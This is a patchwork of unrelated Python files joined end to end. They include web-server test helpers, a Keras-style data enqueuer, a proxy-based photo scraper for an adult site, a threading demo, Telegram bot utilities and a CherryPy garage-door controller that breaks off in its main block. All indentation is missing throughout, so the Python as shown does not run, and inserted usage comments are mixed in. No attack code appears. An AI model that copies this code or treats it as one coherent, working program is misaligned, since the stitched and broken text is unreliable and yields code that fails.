def recvall(self, sock, buff_size=4096):
data = b''
while select.select([sock], [], [], 1)[0]:
try:
part = sock.recv(buff_size)
except:
break
data += part
if not len(part):
break
return data
def _resp_to_dict(self, resp):
m = re.search('(.*?\x0d\x0a?)\x0d\x0a?(.*)', resp, re.M | re.S)
if not m:
return {}
headers_text, body = m.group(1), m.group(2)
p = re.compile('(.*?)\x0d\x0a?', re.M | re.S)
headers_lines = p.findall(headers_text)
status = re.search('^HTTP\/\d\.\d\s(\d+)|$', headers_lines.pop(0)).group(1)
headers = {}
for line in headers_lines:
m = re.search('(.*)\:\s(.*)', line)
if m.group(1) not in headers:
headers[m.group(1)] = m.group(2)
elif isinstance(headers[m.group(1)], list):
headers[m.group(1)].append(m.group(2))
else:
headers[m.group(1)] = [headers[m.group(1)], m.group(2)]
return {
'status': int(status),
'headers': headers,
'body': body
}
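# Editorial usage sketch (illustrative, not part of the original test suite): inside
# a test derived from TestUnitHTTP one might issue
#     resp = self.get(url='/', port=7080)
#     self.assertEqual(resp['status'], 200)
# where resp is the dict built by _resp_to_dict ('status', 'headers', 'body').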
class TestUnitControl(TestUnitHTTP):
# TODO socket reuse
# TODO http client
def conf(self, conf, path='/config'):
if isinstance(conf, dict):
conf = json.dumps(conf)
if path[:1] != '/':
path = '/config/' + path
return json.loads(self.put(
url=path,
body=conf,
sock_type='unix',
addr=self.testdir + '/control.unit.sock'
)['body'])
def conf_get(self, path='/config'):
if path[:1] != '/':
path = '/config/' + path
return json.loads(self.get(
url=path,
sock_type='unix',
addr=self.testdir + '/control.unit.sock'
)['body'])
def conf_delete(self, path='/config'):
if path[:1] != '/':
path = '/config/' + path
return json.loads(self.delete(
url=path,
sock_type='unix',
addr=self.testdir + '/control.unit.sock'
)['body'])
class TestUnitApplicationProto(TestUnitControl):
current_dir = os.path.dirname(os.path.abspath(__file__))
def sec_epoch(self):
return time.mktime(time.gmtime())
def date_to_sec_epoch(self, date, template='%a, %d %b %Y %H:%M:%S %Z'):
return time.mktime(time.strptime(date, template))
def search_in_log(self, pattern):
with open(self.testdir + '/unit.log', 'r', errors='ignore') as f:
return re.search(pattern, f.read())
class TestUnitApplicationPython(TestUnitApplicationProto):
def load(self, script, name=None):
if name is None:
name = script
self.conf({
"listeners": {
"*:7080": {
"application": name
}
},
"applications": {
name: {
"type": "python",
"processes": { "spare": 0 },
"path": self.current_dir + '/python/' + script,
"working_directory": self.current_dir + '/python/' + script,
"module": "wsgi"
}
}
})
class TestUnitApplicationRuby(TestUnitApplicationProto):
def load(self, script, name='config.ru'):
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "ruby",
"processes": { "spare": 0 },
"working_directory": self.current_dir + '/ruby/' + script,
"script": self.current_dir + '/ruby/' + script + '/' + name
}
}
})
class TestUnitApplicationPHP(TestUnitApplicationProto):
def load(self, script, name='index.php'):
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "php",
"processes": { "spare": 0 },
"root": self.current_dir + '/php/' + script,
"working_directory": self.current_dir + '/php/' + script,
"index": name
}
}
})
class TestUnitApplicationGo(TestUnitApplicationProto):
def load(self, script, name='app'):
if not os.path.isdir(self.testdir + '/go'):
os.mkdir(self.testdir + '/go')
env = os.environ.copy()
env['GOPATH'] = self.pardir + '/go'
process = subprocess.Popen(['go', 'build', '-o',
self.testdir + '/go/' + name,
self.current_dir + '/go/' + script + '/' + name + '.go'],
env=env)
process.communicate()
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "external",
"processes": { "spare": 0 },
"working_directory": self.current_dir + '/go/' + script,
"executable": self.testdir + '/go/' + name
}
}
})
class TestUnitApplicationNode(TestUnitApplicationProto):
def load(self, script, name='app.js'):
# copy application
shutil.copytree(self.current_dir + '/node/' + script,
self.testdir + '/node')
# link modules
os.symlink(self.pardir + '/node/node_modules',
self.testdir + '/node/node_modules')
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "external",
"processes": { "spare": 0 },
"working_directory": self.testdir + '/node',
"executable": name
}
}
})
class TestUnitApplicationPerl(TestUnitApplicationProto):
def load(self, script, name='psgi.pl'):
self.conf({
"listeners": {
"*:7080": {
"application": script
}
},
"applications": {
script: {
"type": "perl",
"processes": { "spare": 0 },
"working_directory": self.current_dir + '/perl/' + script,
"script": self.current_dir + '/perl/' + script + '/' + name
}
}
})
class TestUnitApplicationTLS(TestUnitApplicationProto):
def __init__(self, test):
super().__init__(test)
self.context = ssl.create_default_context()
self.context.check_hostname = False
self.context.verify_mode = ssl.CERT_NONE
def certificate(self, name='default', load=True):
subprocess.call(['openssl', 'req', '-x509', '-new', '-config',
self.testdir + '/openssl.conf', '-subj', '/CN=' + name + '/',
'-out', self.testdir + '/' + name + '.crt',
'-keyout', self.testdir + '/' + name + '.key'])
if load:
self.certificate_load(name)
def certificate_load(self, crt, key=None):
if key is None:
key = crt
with open(self.testdir + '/' + key + '.key', 'rb') as k, \
open(self.testdir + '/' + crt + '.crt', 'rb') as c:
return self.conf(k.read() + c.read(), '/certificates/' + crt)
def get_ssl(self, **kwargs):
return self.get(wrapper=self.context.wrap_socket,
**kwargs)
def post_ssl(self, **kwargs):
return self.post(wrapper=self.context.wrap_socket,
**kwargs)
def get_server_certificate(self, addr=('127.0.0.1', 7080)):
return ssl.get_server_certificate(addr)
def load(self, script, name=None):
if name is None:
name = script
# create default openssl configuration
with open(self.testdir + '/openssl.conf', 'w') as f:
f.write("""[ req ]
default_bits = 1024
encrypt_key = no
distinguished_name = req_distinguished_name
[ req_distinguished_name ]""")
self.conf({
"listeners": {
"*:7080": {
"application": name
}
},
"applications": {
name: {
"type": "python",
"processes": { "spare": 0 },
"path": self.current_dir + '/python/' + script,
"working_directory": self.current_dir + '/python/' + script,
"module": "wsgi"
}
}
})
|
data_util.py
|
'''
this file is modified from keras implemention of data process multi-threading,
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import multiprocessing
import threading
import time
import numpy as np
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
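# Editorial usage sketch (not in the original file): wrap a toy generator in a
# GeneratorEnqueuer, pull a few batches, then shut the worker down. The generator
# and batch shape below are illustrative assumptions.
if __name__ == '__main__':
    def _toy_generator():
        i = 0
        while True:
            yield np.arange(i, i + 4)
            i += 4
    enqueuer = GeneratorEnqueuer(_toy_generator(), use_multiprocessing=False)
    enqueuer.start(workers=1, max_queue_size=4)
    batches = enqueuer.get()
    for _ in range(3):
        print(next(batches))
    enqueuer.stop()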
|
photos.py
|
# -*- coding: UTF-8 -*-
from .core import *
class Photos(object):
def __init__(self, ProxyDictionary, keywords=[], *args):
self.keywords = keywords
self.ProxyDictionary = ProxyDictionary
self.photos_queue = Queue()
def _loadAlbumsPage(self, page_num):
# url example:
# pornhub.com/albums/female-straight?search=arg1+arg2
# pornhub.com/albums/uncategorized?search=arg1&page=3
payload = {"search" : "", "page" : page_num}
categories = list()
for item in self.keywords:
if (item == "female"):
categories.append(item)
elif (item == "straight"):
categories.append(item)
elif (item == "misc"):
categories.append(item)
elif (item == "male"):
categories.append(item)
elif (item == "gay"):
categories.append(item)
else:
payload["search"] += (item + " ")
search_url = BASE_URL + ALBUMS_URL + "-".join(categories) + "?"
r = requests.get(search_url, params=payload, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
return BeautifulSoup(html, "lxml")
def _scrapAlbumsURL(self, soup_data):
album_divs = soup_data.find_all("div", { "class" : "photoAlbumListBlock" } )
albums_url = list()
for album_div in album_divs:
for a_tag in album_div.find_all("a", href=True):
url = a_tag.attrs["href"]
if isAlbum(url):
albums_url.append(BASE_URL + url)
break
return albums_url
def _scrapPhotoFullURL(self, preview_url):
r = requests.get(preview_url, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
soup = BeautifulSoup(html, "lxml")
for image in soup.find_all("img", src=True):
image_url = image.attrs["src"]
if isPhoto(image_url):
self.photos_queue.put(str(image_url))
return image_url
return False
def _scrapAlbumPhotos(self, album_url):
r = requests.get(album_url, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
soup = BeautifulSoup(html, "lxml")
for possible_image in soup.find_all("a", href=True):
try:
preview_url = possible_image.attrs["href"]
if isPhotoPreview(preview_url):
yield (BASE_URL + preview_url)
except Exception as E:
pass
def getPhotos(self, quantity = 1, page = 1, infinity = False):
"""
Download photos.
:param quantity: number of photos to return
:param page: starting page number
:param infinity: never stop downloading
"""
quantity = quantity if quantity >= 1 else 1
page = page if page >= 1 else 1
found = 0
workers = list()
while True:
for album_url in self._scrapAlbumsURL(self._loadAlbumsPage(page)):
for preview_url in self._scrapAlbumPhotos(album_url):
worker = Thread(target=self._scrapPhotoFullURL, kwargs={"preview_url" : preview_url})
worker.start()
workers.append(worker)
while not self.photos_queue.empty():
if (found < quantity) or (infinity):
yield self.photos_queue.get()
found += 1
else:
                            return
if (len(workers)+1) % 4 == 0:
time.sleep(TIME_TO_WAIT)
page += 1
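# Editorial usage sketch (illustrative; the proxy settings and keywords below are
# assumptions, not part of the original module):
#     photos = Photos({"https": "socks5h://127.0.0.1:9050"}, keywords=["misc"])
#     for url in photos.getPhotos(quantity=5):
#         print(url)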
|
thread_demo.py
|
from threading import Thread, current_thread
def thread_test(name):
print("thread {} is running...".format(current_thread().name))
print("hello ", name)
print("thread {} ended".format(current_thread().name))
if __name__ == '__main__':
print("thread {} is running...".format(current_thread().name))
print("hello world")
t = Thread(target=thread_test, args=("test", ), name="TestThread")
t.start()
t.join()
print("thread {} ended".format(current_thread().name))
|
util.py
|
# -*- coding: utf-8 -*-
import random
import re
import string
import threading
import traceback
import warnings
from typing import Any, Callable, List, Dict, Optional, Union
# noinspection PyPep8Naming
import queue as Queue
import logging
from telebot import types
try:
import ujson as json
except ImportError:
import json
try:
# noinspection PyPackageRequirements
from PIL import Image
from io import BytesIO
pil_imported = True
except:
pil_imported = False
MAX_MESSAGE_LENGTH = 4096
logger = logging.getLogger('TeleBot')
thread_local = threading.local()
content_type_media = [
'text', 'audio', 'animation', 'document', 'photo', 'sticker', 'video', 'video_note', 'voice', 'contact', 'dice', 'poll',
'venue', 'location'
]
content_type_service = [
'new_chat_members', 'left_chat_member', 'new_chat_title', 'new_chat_photo', 'delete_chat_photo', 'group_chat_created',
'supergroup_chat_created', 'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message',
'proximity_alert_triggered', 'voice_chat_scheduled', 'voice_chat_started', 'voice_chat_ended',
'voice_chat_participants_invited', 'message_auto_delete_timer_changed'
]
update_types = [
"update_id", "message", "edited_message", "channel_post", "edited_channel_post", "inline_query",
"chosen_inline_result", "callback_query", "shipping_query", "pre_checkout_query", "poll", "poll_answer",
"my_chat_member", "chat_member", "chat_join_request"
]
class WorkerThread(threading.Thread):
count = 0
def __init__(self, exception_callback=None, queue=None, name=None):
if not name:
name = "WorkerThread{0}".format(self.__class__.count + 1)
self.__class__.count += 1
if not queue:
queue = Queue.Queue()
threading.Thread.__init__(self, name=name)
self.queue = queue
self.daemon = True
self.received_task_event = threading.Event()
self.done_event = threading.Event()
self.exception_event = threading.Event()
self.continue_event = threading.Event()
self.exception_callback = exception_callback
self.exception_info = None
self._running = True
self.start()
def run(self):
while self._running:
try:
task, args, kwargs = self.queue.get(block=True, timeout=.5)
self.continue_event.clear()
self.received_task_event.clear()
self.done_event.clear()
self.exception_event.clear()
logger.debug("Received task")
self.received_task_event.set()
task(*args, **kwargs)
logger.debug("Task complete")
self.done_event.set()
except Queue.Empty:
pass
except Exception as e:
logger.debug(type(e).__name__ + " occurred, args=" + str(e.args) + "\n" + traceback.format_exc())
self.exception_info = e
self.exception_event.set()
if self.exception_callback:
self.exception_callback(self, self.exception_info)
self.continue_event.wait()
def put(self, task, *args, **kwargs):
self.queue.put((task, args, kwargs))
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
self.continue_event.set()
def stop(self):
self._running = False
class ThreadPool:
def __init__(self, num_threads=2):
self.tasks = Queue.Queue()
self.workers = [WorkerThread(self.on_exception, self.tasks) for _ in range(num_threads)]
self.num_threads = num_threads
self.exception_event = threading.Event()
self.exception_info = None
def put(self, func, *args, **kwargs):
self.tasks.put((func, args, kwargs))
def on_exception(self, worker_thread, exc_info):
self.exception_info = exc_info
self.exception_event.set()
worker_thread.continue_event.set()
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
def close(self):
for worker in self.workers:
worker.stop()
for worker in self.workers:
worker.join()
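# Editorial usage sketch (illustrative): a pool of two workers executing queued
# callables; raise_exceptions() re-raises anything a worker recorded and close()
# stops and joins the workers.
#     pool = ThreadPool(num_threads=2)
#     pool.put(print, "hello from a worker thread")
#     pool.raise_exceptions()
#     pool.close()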
class AsyncTask:
def __init__(self, target, *args, **kwargs):
self.target = target
self.args = args
self.kwargs = kwargs
self.done = False
self.thread = threading.Thread(target=self._run)
self.thread.start()
def _run(self):
try:
self.result = self.target(*self.args, **self.kwargs)
except Exception as e:
self.result = e
self.done = True
def wait(self):
if not self.done:
self.thread.join()
if isinstance(self.result, BaseException):
raise self.result
else:
return self.result
class CustomRequestResponse():
def __init__(self, json_text, status_code = 200, reason = ""):
self.status_code = status_code
self.text = json_text
self.reason = reason
def json(self):
return json.loads(self.text)
def async_dec():
def decorator(fn):
def wrapper(*args, **kwargs):
return AsyncTask(fn, *args, **kwargs)
return wrapper
return decorator
def is_string(var):
return isinstance(var, str)
def is_dict(var):
return isinstance(var, dict)
def is_bytes(var):
return isinstance(var, bytes)
def is_pil_image(var):
return pil_imported and isinstance(var, Image.Image)
def pil_image_to_file(image, extension='JPEG', quality='web_low'):
if pil_imported:
photoBuffer = BytesIO()
image.convert('RGB').save(photoBuffer, extension, quality=quality)
photoBuffer.seek(0)
return photoBuffer
else:
raise RuntimeError('PIL module is not imported')
def is_command(text: str) -> bool:
"""
Checks if `text` is a command. Telegram chat commands start with the '/' character.
:param text: Text to check.
:return: True if `text` is a command, else False.
"""
if text is None: return False
return text.startswith('/')
def extract_command(text: str) -> Union[str, None]:
"""
Extracts the command from `text` (minus the '/') if `text` is a command (see is_command).
If `text` is not a command, this function returns None.
Examples:
extract_command('/help'): 'help'
extract_command('/help@BotName'): 'help'
extract_command('/search black eyed peas'): 'search'
extract_command('Good day to you'): None
:param text: String to extract the command from
:return: the command if `text` is a command (according to is_command), else None.
"""
if text is None: return None
return text.split()[0].split('@')[0][1:] if is_command(text) else None
def extract_arguments(text: str) -> str:
"""
Returns the argument after the command.
Examples:
extract_arguments("/get name"): 'name'
extract_arguments("/get"): ''
extract_arguments("/get@botName name"): 'name'
:param text: String to extract the arguments from a command
:return: the arguments if `text` is a command (according to is_command), else None.
"""
regexp = re.compile(r"/\w*(@\w*)*\s*([\s\S]*)", re.IGNORECASE)
result = regexp.match(text)
return result.group(2) if is_command(text) else None
def split_string(text: str, chars_per_string: int) -> List[str]:
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
:param text: The text to split
:param chars_per_string: The number of characters per line the text is split into.
:return: The splitted text as a list of strings.
"""
return [text[i:i + chars_per_string] for i in range(0, len(text), chars_per_string)]
def smart_split(text: str, chars_per_string: int=MAX_MESSAGE_LENGTH) -> List[str]:
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
If `chars_per_string` > 4096: `chars_per_string` = 4096.
Splits by '\n', '. ' or ' ' in exactly this priority.
:param text: The text to split
:param chars_per_string: The number of maximum characters per part the text is split to.
:return: The splitted text as a list of strings.
"""
def _text_before_last(substr: str) -> str:
return substr.join(part.split(substr)[:-1]) + substr
if chars_per_string > MAX_MESSAGE_LENGTH: chars_per_string = MAX_MESSAGE_LENGTH
parts = []
while True:
if len(text) < chars_per_string:
parts.append(text)
return parts
part = text[:chars_per_string]
if "\n" in part: part = _text_before_last("\n")
elif ". " in part: part = _text_before_last(". ")
elif " " in part: part = _text_before_last(" ")
parts.append(part)
text = text[len(part):]
def escape(text: str) -> str:
"""
    Replaces the following chars in `text` ('&' with '&amp;', '<' with '&lt;' and '>' with '&gt;').
:param text: the text to escape
:return: the escaped text
"""
    chars = {"&": "&amp;", "<": "&lt;", ">": "&gt;"}
for old, new in chars.items(): text = text.replace(old, new)
return text
def user_link(user: types.User, include_id: bool=False) -> str:
"""
Returns an HTML user link. This is useful for reports.
Attention: Don't forget to set parse_mode to 'HTML'!
Example:
bot.send_message(your_user_id, user_link(message.from_user) + ' started the bot!', parse_mode='HTML')
:param user: the user (not the user_id)
:param include_id: include the user_id
:return: HTML user link
"""
name = escape(user.first_name)
return (f"<a href='tg://user?id={user.id}'>{name}</a>"
+ (f" (<pre>{user.id}</pre>)" if include_id else ""))
def quick_markup(values: Dict[str, Dict[str, Any]], row_width: int=2) -> types.InlineKeyboardMarkup:
"""
Returns a reply markup from a dict in this format: {'text': kwargs}
This is useful to avoid always typing 'btn1 = InlineKeyboardButton(...)' 'btn2 = InlineKeyboardButton(...)'
Example:
quick_markup({
'Twitter': {'url': 'https://twitter.com'},
'Facebook': {'url': 'https://facebook.com'},
'Back': {'callback_data': 'whatever'}
}, row_width=2):
returns an InlineKeyboardMarkup with two buttons in a row, one leading to Twitter, the other to facebook
and a back button below
kwargs can be:
{
'url': None,
'callback_data': None,
'switch_inline_query': None,
'switch_inline_query_current_chat': None,
'callback_game': None,
'pay': None,
'login_url': None
}
:param values: a dict containing all buttons to create in this format: {text: kwargs} {str:}
:param row_width: int row width
:return: InlineKeyboardMarkup
"""
markup = types.InlineKeyboardMarkup(row_width=row_width)
buttons = [
types.InlineKeyboardButton(text=text, **kwargs)
for text, kwargs in values.items()
]
markup.add(*buttons)
return markup
# CREDITS TO http://stackoverflow.com/questions/12317940#answer-12320352
def or_set(self):
self._set()
self.changed()
def or_clear(self):
self._clear()
self.changed()
def orify(e, changed_callback):
if not hasattr(e, "_set"):
e._set = e.set
if not hasattr(e, "_clear"):
e._clear = e.clear
e.changed = changed_callback
e.set = lambda: or_set(e)
e.clear = lambda: or_clear(e)
def OrEvent(*events):
or_event = threading.Event()
def changed():
bools = [ev.is_set() for ev in events]
if any(bools):
or_event.set()
else:
or_event.clear()
def busy_wait():
while not or_event.is_set():
or_event._wait(3)
for e in events:
orify(e, changed)
or_event._wait = or_event.wait
or_event.wait = busy_wait
changed()
return or_event
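# Editorial usage sketch (illustrative): an event that fires when either source fires.
#     e1, e2 = threading.Event(), threading.Event()
#     either = OrEvent(e1, e2)
#     e2.set()
#     either.wait()  # returns because e2 is set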
def per_thread(key, construct_value, reset=False):
if reset or not hasattr(thread_local, key):
value = construct_value()
setattr(thread_local, key, value)
return getattr(thread_local, key)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
# https://stackoverflow.com/a/312464/9935473
for i in range(0, len(lst), n):
yield lst[i:i + n]
def generate_random_token():
return ''.join(random.sample(string.ascii_letters, 16))
def deprecated(warn: bool=True, alternative: Optional[Callable]=None):
"""
Use this decorator to mark functions as deprecated.
When the function is used, an info (or warning if `warn` is True) is logged.
:param warn: If True a warning is logged else an info
:param alternative: The new function to use instead
"""
def decorator(function):
def wrapper(*args, **kwargs):
info = f"`{function.__name__}` is deprecated." + (f" Use `{alternative.__name__}` instead" if alternative else "")
if not warn:
logger.info(info)
else:
logger.warning(info)
return function(*args, **kwargs)
return wrapper
return decorator
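# Editorial usage sketch (illustrative; new_send is a hypothetical replacement):
#     @deprecated(warn=True, alternative=new_send)
#     def old_send(*args, **kwargs):
#         return new_send(*args, **kwargs)
# Calling old_send() logs a warning that points at new_send, then runs the body.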
# Cloud helpers
def webhook_google_functions(bot, request):
"""A webhook endpoint for Google Cloud Functions FaaS."""
if request.is_json:
try:
request_json = request.get_json()
update = types.Update.de_json(request_json)
bot.process_new_updates([update])
return ''
except Exception as e:
print(e)
return 'Bot FAIL', 400
else:
return 'Bot ON'
def antiflood(function, *args, **kwargs):
"""
Use this function inside loops in order to avoid getting TooManyRequests error.
Example:
from telebot.util import antiflood
for chat_id in chat_id_list:
msg = antiflood(bot.send_message, chat_id, text)
    On a TooManyRequests (429) error the call sleeps for the advised retry_after and then retries once.
"""
from telebot.apihelper import ApiTelegramException
from time import sleep
msg = None
try:
msg = function(*args, **kwargs)
except ApiTelegramException as ex:
if ex.error_code == 429:
sleep(ex.result_json['parameters']['retry_after'])
msg = function(*args, **kwargs)
finally:
return msg
|
mitzonURLCmdProcessor.py
|
import logging
import logging.handlers
import logging.config
import os, sys, traceback
import cherrypy
# try:
from cheroot.wsgi import Server as WSGIServer
# except ImportError:
#from cherrypy.wsgiserver import CherryPyWSGIServer as WSGIServer
from MitzonBackend.Sensor import Sensor
from MitzonBackend.Constants import *
from MitzonBackend.CommandQResponse import *
from MitzonBackend.ConfigManager import ConfigManager
from MitzonBackend.GarageDoor import GarageDoor
from MitzonBackend.AlertManager import AlertManager
from MitzonBackend.DeviceManager import DeviceManager
from MitzonBackend.GarageManager import GarageManager
from MitzonBackend.ValveManager import ValveManager
from MitzonBackend.WeatherManager import WeatherManager
from MitzonBackend.NotificationManager import NotificationManager
from queue import *
from threading import Thread
from MitzonBackend.SingletonMeta import SingletonMeta
import types
from time import sleep
import time
import datetime
import json
log = logging.getLogger('Garage.mitzonURLCmdProcessor')
garage_manager_handler = None #GarageManager()
valve_manager_handler = None #ValveManager()
weather_manager_handler = None #WeatherManager()
notification_manager_handler = None
@cherrypy.expose
class mitzonURLCmdProcessor(metaclass=SingletonMeta):
def __init__(self, dispatch: Queue):
log.debug("init mitzonURLCmdProcessor...")
#self.deviceList = {}
self.dispatch = dispatch
# Read Building Config
        '''Create a new device handler and connect to the Arduino USB port'''
self.config_handler = ConfigManager()
self.config_handler.setConfigFileName("config/mitzon_backend.config")
self.dev_manager_handler = DeviceManager()
self.alert_manager_handler = AlertManager()
self.NBR_QUEUE=2
self.server_socket_host =self.config_handler.getConfigParam("SECURITY", "SERVER_SOCKET_HOST")
self.server_socket_port = int(self.config_handler.getConfigParam("SECURITY", "SERVER_SOCKET_PORT"))
self.server_ssl_module = self.config_handler.getConfigParam("SECURITY", "SERVER_SSL_MODULE")
self.server_ssl_certificate = self.config_handler.getConfigParam("SECURITY", "SERVER_SSL_CERTIFICATE")
self.server_ssl_private_key = self.config_handler.getConfigParam("SECURITY", "SERVER_SSL_PRIVATE_KEY")
@cherrypy.tools.accept(media='text/plain')
# s.post('http://127.0.0.1:8080/garage/open/g0')
def _cp_dispatch(self, vpath):
try:
debugstr = ("Received vpath=%s len=%d" % (vpath, len(vpath)))
log.debug(debugstr)
if len(vpath) == 1:
cherrypy.request.params['mything'] = vpath.pop() # ex: garage_door
return self
if len(vpath) == 3:
cherrypy.request.params['mything'] = vpath.pop(0) # /myid/
cherrypy.request.params['myservice'] = vpath.pop(0) # ex: open close
cherrypy.request.params['myid'] = vpath.pop(0) # which one 0, 1, 2...
return self
except Exception:
log.error("_cp_dispatch error in garageURL...")
traceback.print_exc()
os._exit(-1)
return vpath
# @cherrypy.expose
def GET(self):
log.info("Garage Request Received GET")
return cherrypy.session['mything']
@cherrypy.popargs('myservice')
@cherrypy.popargs('myid')
# @cherrypy.expose
def POST(self, mything, myservice=None, myid=None):
cherrypy.session['mything'] = mything
cherrypy.session['myservice'] = myservice
cherrypy.session['myid'] = myid
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
cherrypy.response.headers["Allow"] = "POST, GET, OPTIONS, DELETE, PUT, PATCH"
caller = cherrypy.request.remote.ip
logbuf = "MitzonBackend Request Received POST: %s %s %s " % (mything, myservice, myid)
log.debug(logbuf)
## Test Arduino Device
# self.dispatch.put(('testConnection',"msg Hard coded pin"))
## Send all html POST commands to device through device manager
self.dispatch.put(('processDeviceCommand', mything, myservice, myid))
resp_str=""
resp_array = {}
sub_nbr=0
loopstarttime=time.time()
# for sub_nbr in range(0,2): # 1 only DeviceManager 2 Subscribers are DeviceManager and Alert Manager. Not
while response_queue.qsize()>0 or ( sub_nbr<self.NBR_QUEUE and (time.time()<(loopstarttime+float(self.config_handler.getConfigParam("THREAD_CONTROL","RESP_TIMEOUT")))) ):
try:
resp=response_queue.get(True, float(self.config_handler.getConfigParam("THREAD_CONTROL","RESP_TIMEOUT")))
resp_str = resp_str + resp.getRspPropsToString()+" "
resp_array[sub_nbr]=resp.getRspPropsToArray()
sub_nbr+=1
except Empty:
log.error("response_queue RESP_TIMEOUT=%s/%s/%s" %(mything, myservice, myid))
# resp_str=resp_str + ("RESP_TIMEOUT=%s/%s/%s" %(mything, myservice, myid))
resp_str=resp_str[:-1] #remove Trailing space
# resp_str += self.alert_manager_handler.status().getRspPropsToString()
if log.isEnabledFor(logging.DEBUG):
self.dev_manager_handler.listDevices()
resp_json=json.dumps(resp_array)
# Uncomment return statement below.
return resp_json
#return resp_str
# @cherrypy.expose
def PUT(self):
cherrypy.session['myservice'] = self.myservice
logbuf = "Garage Request Received PUT:"
log.info(logbuf)
DeviceManager.listDevices(self.deviceList)
# @cherrypy.expose
def DELETE(self):
cherrypy.session.pop('myservice', None)
''' Outside Class'''
# @cherrypy.expose
def command_queue_fn(q: Queue, r: Queue):
next = q.get()
while next is not None:
# log.info(next[0] +'/' + next[1:])
resp=next[0](*(next[1:]))
if log.isEnabledFor(logging.DEBUG):
log.debug("command_queue_fn isinstance next = %s", next[0].__self__.__class__.__name__)
if next[0].__self__.__class__.__name__ == "DeviceManager":
r.put(resp)
elif next[0].__self__.__class__.__name__ == "AlertManager":
r.put(resp)
if log.isEnabledFor(logging.DEBUG):
# log.debug("command_queue_fn NOT ADDED TO QUEUE isinstance next = %s",
log.debug("command_queue_fn ADDED TO QUEUE isinstance next = %s",
next[0].__self__.__class__.__name__)
else:
log.error("Unknown class %s" % (next[0].__self__.__class__.__name__))
traceback.print_exc()
os._exit(-1)
next = q.get()
# @cherrypy.expose
def dispatcher_fn(dispatch: Queue, command: Queue, subscribers: list):
next = dispatch.get()
while next is not None:
name = next[0]
args = next[1:]
# log.info('dispatcher_fn name=' + getattr(sub, str(name)) + ' args=' + list(args) )
for sub in subscribers:
try:
#log.debug('dispatcher_fn name= ' + name + 'args=' + args[0] )
command.put(([getattr(sub, str(name))] + list(args)))
except AttributeError as exc:
log.error("dispatcher_fn fn:'%s' arg:'%s'" % (name, args[0]))
                log.error(traceback.extract_stack())
pass
next = dispatch.get()
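# Editorial flow note (derived from the code above): POST() enqueues
# ('processDeviceCommand', mything, myservice, myid) on dispatch_queue;
# dispatcher_fn resolves that name to a bound method on each subscriber and puts
# the call on command_queue; command_queue_fn executes it and pushes DeviceManager
# and AlertManager responses onto response_queue, which POST() drains into its
# JSON reply.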
if __name__ == '__main__':
"""
References:
[LUH] https://www.owasp.org/index.php/List_of_useful_HTTP_headers
[XFO] https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
[CSP] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#Bonus_Rule_.232:_Implement_Content_Security_Policy
"""
_csp_sources = ['default', 'script', 'style', 'img', 'connect', 'font', 'object', 'media', 'frame']
_csp_default_source = "'self'"
_csp_rules = list()
for c in _csp_sources:
_csp_rules.append('{:s}-src {:s}'.format(c, _csp_default_source))
_csp = '; '.join(_csp_rules)
dispatch_queue = Queue()
garageHandler = mitzonURLCmdProcessor(dispatch_queue)
# ''' @TODO Hardcoded RotatingFileHandler '''
